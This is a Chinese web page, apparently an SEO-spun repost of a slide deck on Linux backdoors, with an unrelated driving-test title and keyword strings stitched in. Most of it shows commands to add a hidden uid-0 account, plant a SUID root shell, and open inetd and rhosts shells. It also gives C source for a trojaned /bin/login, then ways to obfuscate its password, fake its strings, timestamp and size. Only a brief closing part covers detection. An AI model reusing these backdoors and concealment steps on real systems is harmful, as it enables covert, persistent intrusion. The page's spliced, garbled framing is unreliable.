b2科目四模拟试题多少题驾考考爆了怎么补救
b2科目四模拟试题多少题 驾考考爆了怎么补救

Linux后门技术及实践.pdf

电脑杂谈  发布时间:2020-01-03 08:01:46  来源:网络整理

360后门_linux 后门_linux shell后门木马

美河学习 Linux后门技术及实践作者:艾奇伟Mail:e4gle@Page:Copyright: Whitecell Security Systems 概述美河学习后门简介常用后门技术后门的监测实例讲解:login后门 后门简介美河学习入侵者完全控制平台后,为便于以后处于而采取的一种技术。一般借助修改平台配置文件和调试第三方后门工具来推动。具有隐蔽性,能规避系统日志,不易被平台管理员发现等特征。 常用后门技术美河学习增加超级用户帐号破解/ 嗅探用户密钥放置SUID Shellrhosts + +利用平台服务程序TCP/UDP/ICMP ShellCrontab定时任务共享库文件工具包rootkit可装载内核组件(LKM) 增加超级用户美河学习# echo “e4gle:x:0:0::/:/bin/sh" >>/etc/passwd# echo “e4gle::-1:-1:-1:-1:-1:-1:500" >>/etc/shadow如果系统不允许uid=0的用户远程登录,还必须降低一个普通客户账号。 破解/ 嗅探用户密钥获得shadow文件后,用John the Ripper工具破解薄弱的用户密码。

linux shell后门木马_360后门_linux 后门

安装sniffit等嗅探工具,telnet、ftp等网段,收集用户密钥。 放置SUID Shell# cp /bin/bash /dev/.rootshell# chmod u+s /dev/.rootshell普通用户在本机运行/dev/.rootshell ,即可获取一个root权限的shell 。 rhosts + +# echo “+ +” > /.rhosts# rsh –l root csh –i远程可以得到一个rootshell。 利用平台服务程序设置/etc/inetd.conf ,daytime stream tcp nowait /bin/sh sh –I用trojan程序替换in.telnetd、in.rexecd等inted的服务程序重定向login程序 TCP/UDP/ICMP ShellBindShell,大部分是基于TCP/UDP协议的网络服务程序,在高端口,很容易被发觉。Ping Backdoorlinux 后门,通过ICMP包激活后门,形成一个Shell通道。TCP ACK数据包后门,能够穿越防火墙。 Crontab定时任务通过Crontab程序调度已加装的后门程序定时运行,一般在晚上时段,是平台管理员不的时间。

linux shell后门木马_360后门_linux 后门

共享库文件在共享库中内嵌后门函数使用后门口令激活Shell,获得权限无法躲避系统管理员对二进制文件本身的校准 工具包rootkit包含一系列系统及后门工具:– 清除日志中的登录记录– 伪装校验和– 替换netstat、ps等网络软件– 后门登录程序便于安装和使用 可装载内核组件(LKM)LKM:Loadable Kernel Modules动态的读取,不需要重新编译内核。截获系统读取,具有隐藏目录、文件、进程、网络联结等强大用途。自身隐蔽性好,发现难度较大。著名的LKM包有adore和knark。 后门的评估以自己的经验,结合特定的软件,手工作一些测试。使用Tripwire或md5校验来检测平台。借助IDS系统,到目标机器的可疑网络连接。 实例:login后门入侵者先把原始的/bin/login备份,再用一段程序替换/bin/login 。入侵者telnet登录进来的之后,通过环境变量以及终端类型传递了正确的后门密码linux 后门,将直接获取一个Shell;如果是普通客户登录,将会重定向到原始的login文件,来处理正常的登录。最简单的login后门ulogin.c源代码如下: 实例:login后门#include <stdio.h>#define PASSWORD "passWORD"#define _PATH_LOGIN "/sbin/logins"main (argc, argv, envp)int argc;char **argv, **envp;{char *display = getenv("DISPLAY");if ( display == NULL ) {execve(_PATH_LOGIN, argv, envp);perror(_PATH_LOGIN);exit(1);}if (!strcmp(display,PASSWORD)) {system("/bin/csh");exit(1);}execve(_PATH_LOGIN, argv, envp);exit(1);} 利用后门登录首先Telnet服务是开启的,在自己机器上:bash$ export DISPLAY=passWORDbash$ telnetTrying xxx.xxx.xxx.xxx...Connected to (xxx.xxx.xxx.xxx).Escape character is '^]'.% _ strings命令strings命令能够打印出二进制文件中的能显示字符串,用于今天的ulogin程序:bash$ strings ulogin/lib/ld-linux.so.2…………..DISPLAY/sbin/loginspassWORD/bin/csh 加密后门密码(1)1,采用DES算法,即crypt( )函数,编写gen.c程序:#include <unistd.h>main(int argc, char *argv[]){if (argc != 3) {printf("usage: %s <password> <salt>\n", argv[0]);exit(1);}printf("%s\n", crypt(argv[1], argv[2]));} 加密后门密码(1)2、编译为gen,执行./gen hack ui,得到的shadow结果为UiVqMWvDrIQjA。

360后门_linux 后门_linux shell后门木马

3、修改后门源程序ulogin.c:-- 以密文形式的密钥代替ulogin.c中define的宏PASSWORD值。-- 如果后门密码正确,直接给出Shell:if (!strcmp(PASSWORD, crypt(display,PASSWORD))){system(SHELL);exit(1);}用strings命令只能发现加密过的密码。 加密后门密码(2 )采用异或(XOR )算法以十六进制方式表示字符串,以超过non-printable的效果1、编码程序encode.c如下: 加密后门密码(2 )char magic[]="\x71\x67\x6d\x7a\x65\x61\x7a";char *de(char *str,char *key){int i=0,j=0,len;len=strlen(key);while(str[i] != '\0') {str[i]^=key[j];j++;if(j==len) j=0;i++;}return str;}void display(char *str){int i;for(i=0;i<strlen(str);i++) printf("\\x%x",str[i]);printf("\n");}main(){char gets[100], *ptr;ptr=gets;scanf ("%s",ptr);de(ptr,magic);display(ptr);} 加密后门密码(2 )2、编译程序encode,依次执行得到关键字符串与magic串异或后的结果,例如原始login的文件名/sbin/xlogin ,经过异或后为:\x5e\x14\xf\x13\xb\x4e\x2\x1d\x8\xa\x13\xb3、在后门源代码中那样定义:Charlogin[]="\x5e\x14\xf\x13\xb\x4e\x2\x1d\x8\xa\x13\xb";然后插入异或函数char *de ()结合同一magic串,就能分辨出恰当的后门密码。

360后门_linux shell后门木马_linux 后门

用strings命令看不到密码、路径等字符串了。 最后的修饰(1)使后门程序ulogin的strings输出类似于正常login的strings输出,做法为:在ulogin.c代码中增加一个字符串数组char strings[] =“”;,在冒号中填入正常login程序的strings输出结果。以假乱真,增加迷惑性。 最后的修饰(2 )调整后门程序的文件日期、大小等属性:1、日期# ls –l /sbin/xlogin-r-sr-xr-x root root 19300 Feb 11 1998/sbin/xlogin# touch –t 199802110000 ulogin# _ 最后的修饰(2 )2、调整大小# ls –l ulogin /sbin/xlogin-r-sr-xr-x root root 7542 Feb 11 1998 ulogin-r-sr-xr-x root root 19300 Feb 11 1998 /sbin/xlogin# bc19300-754211758# dd if=/sbin/xlogin of=/tmp/t bs=11758 count=11+0 records in1+0 records out11758 bytes transferred in 0.000379 secsbytes/sec)# cat /tmp/t >> ulogin Login后门的监测使用命令md5sum对现有/bin/login文件作校验,与当时的值作非常。使用Red Hat Linux的RPM校验:# rpm –V util-linux在入侵者已经借助后门登录的状况下,who是看不到用户的,查看系统进程,查找login –h xxx.xxx.xxx.xxx的字样。


本文来自电脑杂谈,转载请注明本文网址:
http://www.pc-fly.com/a/jisuanjixue/article-135644-1.html

    相关阅读
      发表评论  请自觉遵守互联网相关的政策法规,严禁发布、暴力、反动的言论

      热点图片
      拼命载入中...